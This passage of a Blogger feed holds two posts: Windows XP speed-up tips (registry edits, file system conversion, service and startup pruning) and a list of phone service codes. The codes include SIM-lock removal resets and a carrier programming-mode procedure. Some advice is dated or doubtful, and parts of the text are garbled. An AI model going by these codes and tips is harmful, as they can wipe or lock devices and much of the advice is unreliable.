time. You can always enable them later if you want to use them.&lt;br /&gt;&lt;br /&gt;Note:&lt;br /&gt;If you are interested in using Remote Desktop or Remote Assistance, see my book Windows XP for Power Users: Power Pack published by John Wiley &amp; Sons.&lt;br /&gt;&lt;br /&gt;1. Open the Start menu, right-click My Computer, and choose Properties.&lt;br /&gt;2. Click the Remote Tab.&lt;br /&gt;3. Clear both check boxes to disable Remote Assistance and Remote Desktop.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Speeding Up the Dual-Boot Timeout&lt;br /&gt;&lt;br /&gt;If you dual-boot your computer with Windows XP and another operating system, you see an operating system selection menu on startup. If you typically boot into Windows XP and not the other operating system, you can speed up the dual-boot timeout value so that you do not wait so long for the boot process to select your default operating system and continue with the boot process. The default timeout value is 30 seconds but you can change this setting to 10. This gives you enough time to select the alternate operating system if you want but also speeds up the boot process. You can skip this section if you do not use a dual-boot configuration.&lt;br /&gt;&lt;br /&gt;Follow these steps:&lt;br /&gt;1. Locate the boot.ini file on your computer. It is a hidden file by default; mine is located in C:\boot.ini.&lt;br /&gt;2. Open the file with Notepad (which is what opens it by default).&lt;br /&gt;3. Change the Timeout value to 10 (see Figure 4-11).&lt;br /&gt;4. Select File/Save and close Notepad.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Speeding Up Your PPPoE Connection&lt;br /&gt;&lt;br /&gt;If you use a Point-to-Point Protocol connection over Ethernet (PPPoE), you may notice a delay in using the PPPoE connection after startup. By default, there is a 120 second delay but you can stop this behavior by manually configuring an IP address for the network adapter card. If you do not use a PPPoE connection, you can skip this section.&lt;br /&gt;&lt;br /&gt;1. Select Start/Connect to/Show All Connections.&lt;br /&gt;2. Open the TCP/IP properties for your LAN network interface card.&lt;br /&gt;3. Manually set the IP address on the TCP/IP properties to an appropriate IP address and subnet mask for your network.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Reducing the Wait Time&lt;br /&gt;&lt;br /&gt;When you start to shut down Windows XP, it has to quit, or "kill," any live applications or processes that are currently running. So close all applications first. However, some applications and processes are always running in the background. You can reduce the amount of time that Windows XP waits for those applications and processes to close before Windows XP kills them. Edit three different Registry settings to change this:&lt;br /&gt;&lt;br /&gt;1. Open the Registry Editor.&lt;br /&gt;2. Navigate to HKEY_CURRENT_USER\Control Panel\Desktop. Select WaitToKillAppTimeout and set the value to 1000.&lt;br /&gt;3. Select the HungAppTimeout value and set it to 1000 as well.&lt;br /&gt;4. Navigate to HKEY_USERS\.DEFAULT\Control Panel\Desktop. Set the WaitToKillAppTimeout and set the value to 1000. Select the HungAppTimeout \newline value and set it to 1000 as well.&lt;br /&gt;5. Navigate to HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control. Select the WaitToKillServiceTimeout value and set it to 1000.&lt;br /&gt;6. Close the Registry Editor.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Automatically Killing Tasks on Shutdown&lt;br /&gt;&lt;br /&gt;You know the drill. You start to shut down the computer, you wait a few moments, and then you see a dialog box asking if you want to kill an application or service that is running. Instead of prompting you, you can make Windows XP take care of the kill task automatically. Here's how:&lt;br /&gt;&lt;br /&gt;1. Open the Registry Editor.&lt;br /&gt;2. Navigate to HKEY_CURRENT_USER\Control Panel\Desktop.&lt;br /&gt;3. Highlight the value AutoEndTasks and change the value to 1.&lt;br /&gt;4. Close the Registry Editor.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Well thats about it... when you done all the steps you machine most run faster...without ANY errors!&lt;br /&gt;&lt;br /&gt;Thanks for the Tips which will make WinXP faster. I would also like to add some tips to make it faster. Here it goes....&lt;br /&gt;&lt;br /&gt;Since defragging the disk won't do much to improve Windows XP performance, here are 23 suggestions that will. Each can enhance the performance and reliability of your PCs. Best of all, most of them will cost you nothing. &lt;br /&gt;&lt;br /&gt;1.) To decrease a system's boot time and increase system performance, use the money you save by not buying defragmentation software -- the built-in Windows defragmenter works just fine -- and instead equip the computer with an Ultra-133 or Serial ATA hard drive with 8-MB cache buffer. &lt;br /&gt;&lt;br /&gt;2.) If a PC has less than 512 MB of RAM, add more memory. This is a relatively inexpensive and easy upgrade that can dramatically improve system performance. &lt;br /&gt;&lt;br /&gt;3.) Ensure that Windows XP is utilizing the NTFS file system. If you're not sure, here's how to check: First, double-click the My Computer icon, right-click on the C: Drive, then select Properties. Next, examine the File System type; if it says FAT32, then back-up any important data. Next, click Start, click Run, type CMD, and then click OK. At the prompt, type CONVERT C: /FS:NTFS and press the Enter key. This process may take a while; it's important that the computer be uninterrupted and virus-free. The file system used by the bootable drive will be either FAT32 or NTFS. I highly recommend NTFS for its superior security, reliability, and efficiency with larger disk drives. &lt;br /&gt;&lt;br /&gt;4.) Disable file indexing. The indexing service extracts information from documents and other files on the hard drive and creates a "searchable keyword index." As you can imagine, this process can be quite taxing on any system. &lt;br /&gt;&lt;br /&gt;The idea is that the user can search for a word, phrase, or property inside a document, should they have hundreds or thousands of documents and not know the file name of the document they want. Windows XP's built-in search functionality can still perform these kinds of searches without the Indexing service. It just takes longer. The OS has to open each file at the time of the request to help find what the user is looking for. &lt;br /&gt;&lt;br /&gt;Most people never need this feature of search. Those who do are typically in a large corporate environment where thousands of documents are located on at least one server. But if you're a typical system builder, most of your clients are small and medium businesses. And if your clients have no need for this search feature, I recommend disabling it. &lt;br /&gt;&lt;br /&gt;Here's how: First, double-click the My Computer icon. Next, right-click on the C: Drive, then select Properties. Uncheck "Allow Indexing Service to index this disk for fast file searching." Next, apply changes to "C: subfolders and files," and click OK. If a warning or error message appears (such as "Access is denied"), click the Ignore All button. &lt;br /&gt;&lt;br /&gt;5.) Update the PC's video and motherboard chipset drivers. Also, update and configure the BIOS. For more information on how to configure your BIOS properly, see this article on my site. &lt;br /&gt;&lt;br /&gt;6.) Empty the Windows Prefetch folder every three months or so. Windows XP can "prefetch" portions of data and applications that are used frequently. This makes processes appear to load faster when called upon by the user. That's fine. But over time, the prefetch folder may become overloaded with references to files and applications no longer in use. When that happens, Windows XP is wasting time, and slowing system performance, by pre-loading them. Nothing critical is in this folder, and the entire contents are safe to delete. &lt;br /&gt;&lt;br /&gt;7.) Once a month, run a disk cleanup. Here's how: Double-click the My Computer icon. Then right-click on the C: drive and select Properties. Click the Disk Cleanup button -- it's just to the right of the Capacity pie graph -- and delete all temporary files. &lt;br /&gt;&lt;br /&gt;8.) In your Device Manager, double-click on the IDE ATA/ATAPI Controllers device, and ensure that DMA is enabled for each drive you have connected to the Primary and Secondary controller. Do this by double-clicking on Primary IDE Channel. Then click the Advanced Settings tab. Ensure the Transfer Mode is set to "DMA if available" for both Device 0 and Device 1. Then repeat this process with the Secondary IDE Channel. &lt;br /&gt;&lt;br /&gt;9.) Upgrade the cabling. As hard-drive technology improves, the cabling requirements to achieve these performance boosts have become more stringent. Be sure to use 80-wire Ultra-133 cables on all of your IDE devices with the connectors properly assigned to the matching Master/Slave/Motherboard sockets. A single device must be at the end of the cable; connecting a single drive to the middle connector on a ribbon cable will cause signaling problems. With Ultra DMA hard drives, these signaling problems will prevent the drive from performing at its maximum potential. Also, because these cables inherently support "cable select," the location of each drive on the cable is important. For these reasons, the cable is designed so drive positioning is explicitly clear. &lt;br /&gt;&lt;br /&gt;10.) Remove all spyware from the computer. Use free programs such as AdAware by Lavasoft or SpyBot Search &amp; Destroy. Once these programs are installed, be sure to check for and download any updates before starting your search. Anything either program finds can be safely removed. Any free software that requires spyware to run will no longer function once the spyware portion has been removed; if your customer really wants the program even though it contains spyware, simply reinstall it. For more information on removing Spyware visit this Web Pro News page.&lt;br /&gt;11.) Remove any unnecessary programs and/or items from Windows Startup routine using the MSCONFIG utility. Here's how: First, click Start, click Run, type MSCONFIG, and click OK. Click the StartUp tab, then uncheck any items you don't want to start when Windows starts. Unsure what some items are? Visit the WinTasks Process Library. It contains known system processes, applications, as well as spyware references and explanations. Or quickly identify them by searching for the filenames using Google or another Web search engine. &lt;br /&gt;&lt;br /&gt;12.) Remove any unnecessary or unused programs from the Add/Remove Programs section of the Control Panel. &lt;br /&gt;&lt;br /&gt;13.) Turn off any and all unnecessary animations, and disable active desktop. In fact, for optimal performance, turn off all animations. Windows XP offers many different settings in this area. Here's how to do it: First click on the System icon in the Control Panel. Next, click on the Advanced tab. Select the Settings button located under Performance. Feel free to play around with the options offered here, as nothing you can change will alter the reliability of the computer -- only its responsiveness. &lt;br /&gt;&lt;br /&gt;14.) If you is an advanced user who is comfortable editing their registry, try some of the performance registry tweaks offered at Tweak XP. &lt;br /&gt;&lt;br /&gt;15.) Visit mcft's Windows update site regularly, and download all updates labeled Critical. Download any optional updates at your discretion. &lt;br /&gt;&lt;br /&gt;16.) Update the customer's anti-virus software on a weekly, even daily, basis. Make sure they have only one anti-virus software package installed. Mixing anti-virus software is a sure way to spell disaster for performance and reliability. &lt;br /&gt;&lt;br /&gt;17.) Make sure the customer has fewer than 500 type fonts installed on their computer. The more fonts they have, the slower the system will become. While Windows XP handles fonts much more efficiently than did the previous versions of Windows, too many fonts -- that is, anything over 500 -- will noticeably tax the system. &lt;br /&gt;&lt;br /&gt;18.) Do not partition the hard drive. Windows XP's NTFS file system runs more efficiently on one large partition. The data is no safer on a separate partition, and a reformat is never necessary to reinstall an operating system. The same excuses people offer for using partitions apply to using a folder instead. For example, instead of putting all your data on the D: drive, put it in a folder called "D drive." You'll achieve the same organizational benefits that a separate partition offers, but without the degradation in system performance. Also, your free space won't be limited by the size of the partition; instead, it will be limited by the size of the entire hard drive. This means you won't need to resize any partitions, ever. That task can be time-consuming and also can result in lost data. &lt;br /&gt;&lt;br /&gt;19.) Check the system's RAM to ensure it is operating properly. I recommend using a free program called MemTest86. The download will make a bootable CD or diskette (your choice), which will run 10 extensive tests on the PC's memory automatically after you boot to the disk you created. Allow all tests to run until at least three passes of the 10 tests are completed. If the program encounters any errors, turn off and unplug the computer, remove a stick of memory (assuming you have more than one), and run the test again. Remember, bad memory cannot be repaired, but only replaced. &lt;br /&gt;&lt;br /&gt;20.) If the PC has a CD or DVD recorder, check the drive manufacturer's Web site for updated firmware. In some cases you'll be able to upgrade the recorder to a faster speed. Best of all, it's free. &lt;br /&gt;&lt;br /&gt;21.) Disable unnecessary services. Windows XP loads a lot of services that your customer most likely does not need. To determine which services you can disable for your client, visit the Black Viper site for Windows XP configurations. &lt;br /&gt;&lt;br /&gt;22.) If you're sick of a single Windows Explorer window crashing and then taking the rest of your OS down with it, then follow this tip: open My Computer, click on Tools, then Folder Options. Now click on the View tab. Scroll down to "Launch folder windows in a separate process," and enable this option. You'll have to reboot your machine for this option to take effect. &lt;br /&gt;&lt;br /&gt;23.) At least once a year, open the computer's cases and blow out all the dust and debris. While you're in there, check that all the fans are turning properly. Also inspect the motherboard capacitors for bulging or leaks.&lt;br /&gt;&lt;br /&gt;10 Easy Steps to Speed Up Your Computer - Without, upgrading&lt;br /&gt;&lt;br /&gt;It seems that the longer you own your computer, the slower it gets! A lot of people will keep their computer until it gets so slow that they feel they need a newer, faster model. Some feel like the reason it is getting slower is because it is getting older, when that is just not the case. Your computer should run just as fast as the day you brought it home – if you follow these 10 Easy Steps to Speed Up Your Computer.&lt;br /&gt;&lt;br /&gt;1. Empty the Temp directory regularly. After a short while, the temp directory fills up with hundreds of temp files that always get scanned over when Windows starts up and when programs launch. This slows everything down immensely.&lt;br /&gt;&lt;br /&gt;Rule of thumb for Temp Files: If you don’t have any programs open (and nothing minimized in the bar below), then you shouldn’t have ANY temp files in your temp directory. If you do, delete them.&lt;br /&gt;&lt;br /&gt;To delete Temp files, make sure NO programs are open, and…&lt;br /&gt;&lt;br /&gt;a. In Windows 95, 98 or Me, go to C:WindowsTemp and delete everything inside the Temp folder.&lt;br /&gt;&lt;br /&gt;b. In Windows 2000 or XP, it is a little trickier. First, make sure that you can see hidden folders. Double-click My Computer. Click on the Tools pull-down menu, and then on Folder Options. Click on the View tab. Scroll down and click on Show Hidden Files and Folders. Click Ok. Now you can go to the C ocuments and SettingsAdministratorLocal SettingsTemp folder. Delete everything here or type&lt;br /&gt;%temp% in run.&lt;br /&gt;&lt;br /&gt;2. Empty the Temporary Internet Files regularly. To empty Temporary Internet Files, go to your Control Panel and double-click the Internet Options icon. Choose to Delete Cookies, and to Delete Files. This will clear all of your Temporary Internet Files.&lt;br /&gt;&lt;br /&gt;3. Check your hard disks for problems.&lt;br /&gt;&lt;br /&gt;a. For Windows 95, 98, or Me, double-click My Computer. Right-click the C-drive and click on Properties. Click on the Tools tab and choose to check the computer for problems. If you choose to do a Thorough Scan, this will do the hardware check for physical disk damage or sector damage. Choose to fix any errors it finds.&lt;br /&gt;&lt;br /&gt;b. For Windows 2000 and XP, double-click My Computer. Right-click the C-drive and click Properties. Click on the Tools tab and choose to check the computer for problems. Click on Check Now. You will then have two check boxes. The top option is for the file check, and the second option is for the hardware (physical disk) check. Check either one, or both. At least check the top one. Hit ok, and reboot. This may take some time, but let it run.&lt;br /&gt;&lt;br /&gt;4. An even more thorough disk check, would be to use a 3rd party utility. One of my favorites is TuneUp Utilities 2004. This program does a really good job of fixing software and physical hard drive problems. It also tunes up your system for increased speed, and streamlines your operating system for peak performance. Download it HERE... http://www.lapeertechgroup.com/downloads.asp&lt;br /&gt;&lt;br /&gt;5. Or, you can do a few of the performance tweaks yourself, if you have Windows XP. By default, EVERYTHING is turned on in Windows XP. It isn’t very streamlined for performance, but rather for appearance. You can turn off a few of the unnecessary features, and Windows will still work just fine, and maybe a little faster.&lt;br /&gt;&lt;br /&gt;To do this, right-click on My Computer and click on Properties. Click on the Advanced tab. Under the Performance section, click on the Settings button. On the Visual Effects tab, you will see a list of check boxes. By default, these are all on. You really don’t need any of them for Windows to run. Go through the check boxes one by one, and determine which ones you can and can’t live without.&lt;br /&gt;&lt;br /&gt;6. Turn off Active Desktop. Active Desktop turns your desktop into a web page, and allows you to have things like a real-time calendar, and up-to-the-minute weather or stocks. These are nice, but really slow down your computer. And even if you don’t use Active Desktop for anything, just having it active can cause a performance decrease. Turn it off.&lt;br /&gt;&lt;br /&gt;a. In Windows 95, 98 and Me, right-click on the desktop and in the pop-up menu, choose Active Desktop. Inside that option, uncheck Active Desktop. If there is no check next to it, then it isn’t on. Don’t choose it. Instead, just click the desktop again to get out of the menu.&lt;br /&gt;&lt;br /&gt;b. In Windows 2000, right-click on the desktop and in the pop-up menu, choose Active Desktop. Inside that option, uncheck Show Web Content. Again, if there is no check next to it, then it is not on. Do not check it.&lt;br /&gt;&lt;br /&gt;c. In Windows XP, right-click on the desktop and in the pop-up menu, choose Properties. On the Desktop tab, choose Customize Desktop. Now, on the Web tab, make sure that there are no websites chosen here. If there aren’t any, then Active Desktop is not on. Cancel and go back to the desktop.&lt;br /&gt;&lt;br /&gt;7. Install and run a good AntiVirus program to keep out viruses that can take over your system. One of my favorites is pc-cillin. It is not only a really good AntiVirus program&lt;br /&gt;&lt;br /&gt;8. Get rid of Spyware. A lot of computer users have Spyware and don’t even know they have it, much less how to get rid of it. If your computer has been taking you to websites that you don’t want to go to, or if you get pop-ups when you aren’t even on the Internet, or if your computer has been running extremely slowly lately, for no reason, you probably have Spyware.&lt;br /&gt;&lt;br /&gt;On all of the computers that I setup, I install two different AntiSpyware programs: AdAware SE and SpyBot. These two programs are highly recommended by TechTV (G4) and other computer authorities . They compliment each other and catch Spyware that the other misses, but together, do a very good job.&lt;br /&gt;&lt;br /&gt;Get SpyBot HERE... http://www.lapeertechgroup.com/downloads.asp. Download all updates and run the Immunize option a couple of times.&lt;br /&gt;&lt;br /&gt;AdAware SE does a good job when you keep up on the updates and manually scan your system with AdAware. Get it HERE... http://www.lapeertechgroup.com/downloads.asp&lt;br /&gt;&lt;br /&gt;In some cases, when the Spyware has become too entwined into your system, even a computer repair technician can’t get rid of the Spyware. At this point, it is better to just backup only what you need and have the operating system reinstalled. Believe me, when your computer gets to this point, you don’t want to just put a “band-aid” on it. Just start from scratch with a clean system. It’s the best way to go.&lt;br /&gt;&lt;br /&gt;9. Streamline MSCONFIG. One thing that really causes a HUGE performance decrease is to have unnecessary programs running in the background. Some of these programs can be seen in your System Tray (located next to the clock). These are tiny programs that are robbing you of memory and processing power. Some of them you need, while most you don’t. Some of the programs you DON’T need are printer icons, CD burning icons, shortcuts to programs (such as video settings), AOL, any Instant Messaging Programs, etc. Just because these programs aren’t always running, doesn’t mean that you still can’t print, burn CDs or Instant Message. They can all be run from a shortcut.&lt;br /&gt;&lt;br /&gt;You can use a utility, called MSCONFIG, to turn OFF unnecessary Start Up items.&lt;br /&gt;&lt;br /&gt;a. In Windows 98, Me, and XP, click on StartRun and type msconfig. Click on the Startup tab. This is a list of everything that is running in the background, some of which show up in the System Tray. Now, be careful, some of these you do need. Some items to keep are Ctfmon.exe (XP), Scan Registry (Win98, Me), Task Monitor (Win98, Me), System Tray (Win98, Me), LoadPowerProfile (Win98, Me), Rundll.32, any AntiVirus programs (such as McAfee, Norton, or AVG). Others, you can uncheck, such as NeroCheck, ypager, qttask, AOL, and any other Instant Messaging programs, or printing programs. Remember, if something doesn’t work, because you turned it off, it can always be turned back on. You just have to reboot every time you make a change here. But, as you uncheck the unnecessary programs that run in the background, you will see that Windows loads much faster, that there are less icons in the System Tray, and that your system is much more “snappy” and quick to respond.&lt;br /&gt;&lt;br /&gt;b. In Windows 2000, MSCONFIG wasn’t supplied. You actually have to download and run an MSCONFIG utility. Download the MSCONFIG utility HERE... http://www.perfectdrivers.com/howto/msconfig.html.&lt;br /&gt;&lt;br /&gt;After you reboot, you will have a window that says that the configuration utility was edited. Just check not to show that in the future, a check box at the bottom. This just means that there was a change made to the MSCONFIG.&lt;br /&gt;&lt;br /&gt;10. Defragment your hard drives. NOTE: to efficiently defragment a hard drive, it likes to have 25% free space. It can still do the defragmentation with only 15% free space, but it takes quite a bit longer. If you can, delete any unnecessary files before deframenting your drives.&lt;br /&gt;&lt;br /&gt;a. To defragment your hard drives (in any Windows operating system), double-click on My Computer. Right-click on the c-drive and click on Properties. Click on the Tools tab and choose the bottom button, to Defragment Now&lt;br /&gt;&lt;br /&gt;Thats all&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-687132850951120697?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/687132850951120697/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2010/03/making-windows-xp-start-faster.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/687132850951120697'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/687132850951120697'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2010/03/making-windows-xp-start-faster.html' title='Making Windows Xp Start  Faster'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-6017745544754470747</id><published>2010-01-16T20:18:00.001-08:00</published><updated>2010-01-16T20:18:50.472-08:00</updated><title type='text'>All phone secrets   UPDATED</title><content type='html'>Mobile Phone Secrets &amp; Tricks&lt;br /&gt;&lt;br /&gt; NOKIA &lt;br /&gt;Nokia Universal Codes&lt;br /&gt;&lt;br /&gt;Code Description :&lt;br /&gt;These Nokia codes will work on most Nokia Mobile Phones&lt;br /&gt;&lt;br /&gt;(1) *3370# Activate Enhanced Full Rate Codec (EFR) - Your phone uses the best sound quality but talk time is reduced my approx. 5%&lt;br /&gt;&lt;br /&gt;(2) #3370# Deactivate Enhanced Full Rate Codec (EFR) OR *3370# ( F avourite )&lt;br /&gt;&lt;br /&gt;(3) *#4720# Activate Half Rate Codec - Your phone uses a lower quality sound but you should gain approx 30% more Talk Time.&lt;br /&gt;&lt;br /&gt;(4) *#4720# Deactivate Half Rate Codec.&lt;br /&gt;&lt;br /&gt;(5) *#0000# Displays your phones software version, 1st Line : Software Version, 2nd Line : Software Release Date, 3rd Line : Compression Type. ( Favourite )&lt;br /&gt;&lt;br /&gt;(6) *#9999# Phones software version if *#0000# does not work.&lt;br /&gt;&lt;br /&gt;(7) *#06# For checking the International Mobile Equipment Identity (IMEI Number). ( Favourite )&lt;br /&gt;&lt;br /&gt;(8) #pw+1234567890+1# Provider Lock Status. (use the "*" button to obtain the "p,w"&lt;br /&gt;and "+" symbols).&lt;br /&gt;&lt;br /&gt;(9) #pw+1234567890+2# Network Lock Status. (use the "*" button to obtain the "p,w"&lt;br /&gt;and "+" symbols).&lt;br /&gt;&lt;br /&gt;(10) #pw+1234567890+3# Country Lock Status. (use the "*" button to obtain the "p,w"&lt;br /&gt;and "+" symbols).&lt;br /&gt;&lt;br /&gt;(11) #pw+1234567890+4# SIM Card Lock Status. (use the "*" button to obtain the "p,w" &lt;br /&gt;and "+" symbols).&lt;br /&gt;&lt;br /&gt;(12) *#147# (vodafone) this lets you know who called you last.&lt;br /&gt;&lt;br /&gt;(13) *#1471# Last call (Only vodofone).&lt;br /&gt;&lt;br /&gt;(14) *#21# Allows you to check the number that "All Calls" are diverted to&lt;br /&gt;&lt;br /&gt;(15) *#2640# Displays security code in use.&lt;br /&gt;&lt;br /&gt;(16) *#30# Lets you see the private number.&lt;br /&gt;&lt;br /&gt;(17) *#43# Allows you to check the "Call Waiting" status of your phone.&lt;br /&gt;&lt;br /&gt;(18) *#61# Allows you to check the number that "On No Reply" calls are diverted to.&lt;br /&gt;&lt;br /&gt;(19) *#62# Allows you to check the number that "Divert If Unreachable (no service)" calls&lt;br /&gt;are diverted to.&lt;br /&gt;&lt;br /&gt;(20) *#67# Allows you to check the number that "On Busy Calls" are diverted to.&lt;br /&gt;&lt;br /&gt;(21) *#67705646# Removes operator logo on 3310 &amp; 3330.&lt;br /&gt;&lt;br /&gt;(22) *#73# Reset phone timers and game scores.&lt;br /&gt;&lt;br /&gt;(23) *#746025625# Displays the SIM Clock status, if your phone supports this power saving feature "SIM Clock Stop Allowed", it means you will get the best standby time possible.&lt;br /&gt;&lt;br /&gt;(24) *#7760# Manufactures code.&lt;br /&gt;&lt;br /&gt;(25) *#7780# Restore factory settings.&lt;br /&gt;&lt;br /&gt;(26) *#8110# Software version for the nokia 8110. &lt;br /&gt;&lt;br /&gt;(27) *#92702689# Displays - 1.Serial Number, 2.Date Made, 3.Purchase Date, 4.Date of last repair (0000 for no repairs), 5.Transfer User Data. To exit this mode you need to switch your phone off then on again. ( Favourite )&lt;br /&gt;&lt;br /&gt;(28) *#94870345123456789# Deactivate the PWM-Mem.&lt;br /&gt;&lt;br /&gt;(29) **21*number# Turn on "All Calls" diverting to the phone number entered.&lt;br /&gt;&lt;br /&gt;(30) **61*number# Turn on "No Reply" diverting to the phone number entered.&lt;br /&gt;&lt;br /&gt;(31) **67*number# Turn on "On Busy" diverting to the phone number entered.&lt;br /&gt;&lt;br /&gt;(32) 12345 This is the default security code.&lt;br /&gt;&lt;br /&gt;press and hold # Lets you switch between lines&lt;br /&gt;&lt;br /&gt;NOKIA 5110/5120/5130/5190 &lt;br /&gt;&lt;br /&gt;IMEI number: * # 0 6 #&lt;br /&gt;Software version: * # 0 0 0 0 #&lt;br /&gt;Simlock info: * # 9 2 7 0 2 6 8 9 #&lt;br /&gt;Enhanced Full Rate: * 3 3 7 0 # [ # 3 3 7 0 # off]&lt;br /&gt;Half Rate: * 4 7 2 0 #&lt;br /&gt;Provider lock status: #pw+1234567890+1&lt;br /&gt;Network lock status #pw+1234567890+2&lt;br /&gt;Provider lock status: #pw+1234567890+3&lt;br /&gt;SimCard lock status: #pw+1234567890+4&lt;br /&gt;&lt;br /&gt;NOKIA 6110/6120/6130/6150/6190&lt;br /&gt;&lt;br /&gt;IMEI number: * # 0 6 #&lt;br /&gt;Software version: * # 0 0 0 0 #&lt;br /&gt;Simlock info: * # 9 2 7 0 2 6 8 9 #&lt;br /&gt;Enhanced Full Rate: * 3 3 7 0 # [ # 3 3 7 0 # off]&lt;br /&gt;Half Rate: * 4 7 2 0 #&lt;br /&gt;&lt;br /&gt;NOKIA 3110&lt;br /&gt;&lt;br /&gt;IMEI number: * # 0 6 #&lt;br /&gt;Software version: * # 0 0 0 0 # or * # 9 9 9 9 # or * # 3 1 1 0 #&lt;br /&gt;Simlock info: * # 9 2 7 0 2 6 8 9 #&lt;br /&gt;&lt;br /&gt;NOKIA 3330&lt;br /&gt;&lt;br /&gt;*#06#&lt;br /&gt;This will show your warranty details *#92702689#&lt;br /&gt;*3370#&lt;br /&gt;Basically increases the quality of calling sound, but decreases battery length.&lt;br /&gt;#3370#&lt;br /&gt;Deactivates the above&lt;br /&gt;*#0000#&lt;br /&gt;Shows your software version&lt;br /&gt;*#746025625#This shows if your phone will allow sim clock stoppage&lt;br /&gt;*4370#&lt;br /&gt;Half Rate Codec activation. It will automatically restart&lt;br /&gt;#4370#&lt;br /&gt;Half Rate Codec deactivation. It will automatically restart&lt;br /&gt;Restore Factory Settings&lt;br /&gt;To do this simply use this code *#7780#&lt;br /&gt;Manufacturer Info&lt;br /&gt;Date of Manufacturing *#3283#&lt;br /&gt;*3001#12345# (TDMA phones only) &lt;br /&gt;&lt;br /&gt;This will put your phone into programming mode, and you'll be presented with the programming menu.&lt;br /&gt;2) Select "NAM1"&lt;br /&gt;3) Select "PSID/RSID"&lt;br /&gt;4) Select "P/RSID 1"&lt;br /&gt;Note: Any of the P/RSIDs will work&lt;br /&gt;5) Select "System Type" and set it to Private&lt;br /&gt;6) Select "PSID/RSID" and set it to 1&lt;br /&gt;7) Select "Connected System ID"&lt;br /&gt;Note: Enter your System ID for Cantel, which is 16401 or 16423. If you don't know yours,&lt;br /&gt;ask your local dealer for it.&lt;br /&gt;8) Select "Alpha Tag"&lt;br /&gt;9) Enter a new tag, then press OK&lt;br /&gt;10) Select "Operator Code (SOC)" and set it to 2050&lt;br /&gt;11) Select "Country Code" and set it to 302 for Canada, and 310 for the US.&lt;br /&gt;12) Power down the phone and power it back on again&lt;br /&gt;ISDN Code&lt;br /&gt;To check the ISDN number on your Nokia use this code *#92772689#&lt;br /&gt;&lt;br /&gt;.:: Ericsson ::. &lt;br /&gt;&lt;br /&gt;Ericson T65&lt;br /&gt;&lt;br /&gt;*#05# Fake Insert puk screen Press no to exit&lt;br /&gt;&lt;br /&gt;Ericsson T20&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Ericsson T20&lt;br /&gt;&lt;br /&gt;MENU tecnichal Info&lt;br /&gt;[type] &gt;*&lt;&lt;*&lt;*Displays :1] Info service1] Info SW2] Info hardware3] SIMlock4]setup2] Service setup1] Contrast3]Service Test1] Display2]Leds3]Keyboard4] ringer5] Vibration6]Headset7] Microphone8]Clock4] Names ListMENU info[Type] &gt;*&lt;&lt;**&lt;Network and Subnetwork : NCK and NSCKEricsson T28 &gt;*&lt;&lt;*&lt;* menu Tecnichal infoSW vers. and name list&gt;*&lt;&lt;**&lt; menu Personal InfoNetwork and Subnetwork : NCK and NSCK&lt; and &gt; are the right and left menu's keys&lt;br /&gt;&lt;br /&gt;Ericsson T18s/T10/A1018s&lt;br /&gt;&lt;br /&gt;&gt;*&lt;&lt;*&lt;* softwareCXC125065 Internal product codePRG970715 1515 Software version and SW rev.&lt;* CLR &lt;&gt;&lt;**&gt;*&lt;&lt;*&lt;*&gt; Displays texts and messages in the phone&lt;br /&gt;It will be displayed " TEXT " then push YES&lt;br /&gt;&lt; and &gt; are the right and left menu's keys&lt;br /&gt;!!!&gt;&lt;**Control /Enable SIM Lock!!!Ericsson R310 Technical Info : &gt;*&lt;&lt;*&lt;*Options :1) service Infoinfo SoftwareSimlockConfiguration2) Service TestDisplayLed/IlluminationKeyboardringerVibrationHeadsetMicrophoneClock3)Text's name ListInfo personal : &gt;*&lt;&lt;**&lt;&lt;br /&gt;&lt;br /&gt;SIM Locking ( 8 digits' code ) ( it could harm your phone )&lt;br /&gt;1) Network&lt;br /&gt;2) Subnetwork&lt;br /&gt;3) SP&lt;br /&gt;4) Corporate&lt;br /&gt;&lt;br /&gt;.:: Siemens ::.&lt;br /&gt;&lt;br /&gt;Siemens C25&lt;br /&gt;&lt;br /&gt;IMEI number: * # 0 6 #&lt;br /&gt;Software version: put off sim card and enter: : * # 0 6 # and press LONG KEY&lt;br /&gt;Bonus screen: in phone booke: + 1 2 0 2 2 2 4 3 1 2 1&lt;br /&gt;&lt;br /&gt;.:: Bosch ::.&lt;br /&gt;&lt;br /&gt;IMEI Number: * # 0 6 #&lt;br /&gt;Dafault Language: * # 0 0 0 0 #&lt;br /&gt;Net Monitor: * # 3 2 6 2 2 5 5 * 8 3 7 8 #&lt;br /&gt;&lt;br /&gt;.::Alcatel ::.&lt;br /&gt;&lt;br /&gt;IMEI number: * # 0 6 #&lt;br /&gt;Software version: * # 0 6 #&lt;br /&gt;Net Monitor: 0 0 0 0 0 0 *&lt;br /&gt;&lt;br /&gt;.:: Samsung ::.&lt;br /&gt;&lt;br /&gt;Samsung SGH600/2100DB &lt;br /&gt;&lt;br /&gt;IMEI number: * # 0 6 #&lt;br /&gt;Software version: * # 9 9 9 9 # albo * # 0 8 3 7 #&lt;br /&gt;Net Monitor: * # 0 3 2 4 #&lt;br /&gt;Chaning LCD contrast: * # 0 5 2 3 #&lt;br /&gt;Memory info: * # 0 3 7 7 # albo * # 0 2 4 6 #&lt;br /&gt;Reset pamieci (SIMLOCK`a removing!!!): *2767*3855#&lt;br /&gt;Reset pamieci CUSTOM: 